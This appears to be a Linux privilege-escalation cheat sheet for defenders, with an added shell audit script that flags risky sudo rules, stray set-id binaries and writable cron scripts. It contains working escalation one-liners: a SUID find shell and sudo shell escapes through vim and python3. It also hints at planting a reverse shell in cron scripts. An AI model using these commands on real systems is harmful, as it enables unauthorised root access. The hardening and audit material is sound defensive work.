After initial access, attackers attempt privilege escalation to gain root. Understanding these techniques helps defenders harden systems.
Enumeration
```bash
# System info
uname -a
cat /etc/os-release
# Current user
id
whoami
# Sudo permissions
sudo -l
# SUID binaries
find / -perm -4000 2>/dev/null
# Writable directories
find / -writable -type d 2>/dev/null
```
Common Techniques
SUID Exploitation
```bash
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check GTFOBins for exploitation
# Example: SUID find
find . -exec /bin/sh -p \;
```
Sudo Misconfigurations
```bash
# If sudo -l shows:
# (root) NOPASSWD: /usr/bin/vim
# Escape to shell
sudo vim -c ':!/bin/sh'
# (root) NOPASSWD: /usr/bin/python3
sudo python3 -c 'import os; os.system("/bin/sh")'
```
Cron Jobs
```bash
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
# If script is writable, inject reverse shell
```
Prevention
- Minimize SUID binaries
- Restrict sudo privileges carefully
- Keep kernel updated
- Use AppArmor/SELinux
- Audit file permissions regularly
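The audit script below is an added example written for this page, not code from the original cheat sheet. It turns the Enumeration, SUID Exploitation, Sudo Misconfigurations and Cron Jobs sections into the defender-side checks the Prevention list calls for: it flags NOPASSWD sudo rules that hand out a shell-capable binary, lists set-id binaries that are missing from an allow-list, and reports cron scripts that are group- or world-writable. The starting list of shell-capable binaries, the one-path-per-line allow-list format, and the use of GNU `stat -c` are assumptions of this example.

```shell
#!/bin/sh
# Added defender-side audit helpers (example code for this page, not the
# original cheat sheet). Each function prints its findings and returns 0 when
# something risky was found, 1 when the input is clean.

# Disable globbing: sudoers and crontab lines contain literal '*' characters.
set -f

# Binaries that can spawn a shell when run under sudo (assumed starting list;
# extend it from your own sudo policy).
SHELL_CAPABLE_BINS="vim vi nano less more man python python3 perl find awk bash sh"

# Flag NOPASSWD rules whose command is a shell-capable binary. Accepts raw
# `sudo -l` output or sudoers-format lines; both carry "NOPASSWD: cmd[, cmd]".
flag_risky_sudo_rules() {
    file=$1
    found=1
    while IFS= read -r line; do
        case "$line" in
            *NOPASSWD:*) ;;
            *) continue ;;
        esac
        # keep everything after "NOPASSWD:", split comma-separated commands
        cmd=$(printf '%s\n' "$line" | sed 's/.*NOPASSWD:[[:space:]]*//; s/,/ /g')
        for c in $cmd; do
            case "$c" in /*) ;; *) continue ;; esac   # only absolute paths
            bin=$(basename "$c")
            for b in $SHELL_CAPABLE_BINS; do
                [ "$bin" = "$b" ] || continue
                printf 'RISK sudo: %s -> %s\n' "$c" "$line"
                found=0
            done
        done
    done < "$file"
    return $found
}

# List SUID/SGID files under a directory tree that are not on an allow-list
# (one absolute path per line), so new or unexpected set-id binaries stand out.
list_unexpected_suid() {
    root=$1
    allow=$2
    found=1
    for f in $(find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null); do
        grep -qxF "$f" "$allow" && continue
        printf 'RISK suid: %s\n' "$f"
        found=0
    done
    return $found
}

# Report cron jobs whose script is group- or world-writable. Parses the
# /etc/crontab and /etc/cron.d layout (min hour dom mon dow user command) and
# the @daily-style shorthand (@period user command); per-user crontabs have
# no user field and are not handled here.
find_writable_cron_scripts() {
    crontab=$1
    found=1
    while IFS= read -r line; do
        case "$line" in
            ''|\#*|[A-Za-z_]*=*) continue ;;   # blank, comment, VAR=value
        esac
        set -- $line
        case "$1" in
            @*) script=$3 ;;
            *)  script=$7 ;;
        esac
        [ -n "$script" ] && [ -f "$script" ] || continue
        # stat -c is GNU coreutils; %a prints the octal mode, e.g. 664 or 4755
        mode=$(stat -c '%a' "$script")
        # 022 masks the group and other write bits
        if [ $(( 0$mode & 022 )) -ne 0 ]; then
            printf 'RISK cron: %s (mode %s)\n' "$script" "$mode"
            found=0
        fi
    done < "$crontab"
    return $found
}
```

On a live host, run the checks as root, for example `sudo -l > /tmp/sudo.txt; flag_risky_sudo_rules /tmp/sudo.txt`, `list_unexpected_suid / /etc/suid-allowlist`, and `find_writable_cron_scripts /etc/crontab` followed by each file in `/etc/cron.d`. Because each function returns 0 only when it found something, the three calls can be chained into a nightly job that alerts on any non-zero finding count.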
Automated Tools
- LinPEAS - Comprehensive enumeration
- linux-exploit-suggester
- pspy - Monitor processes
December 2024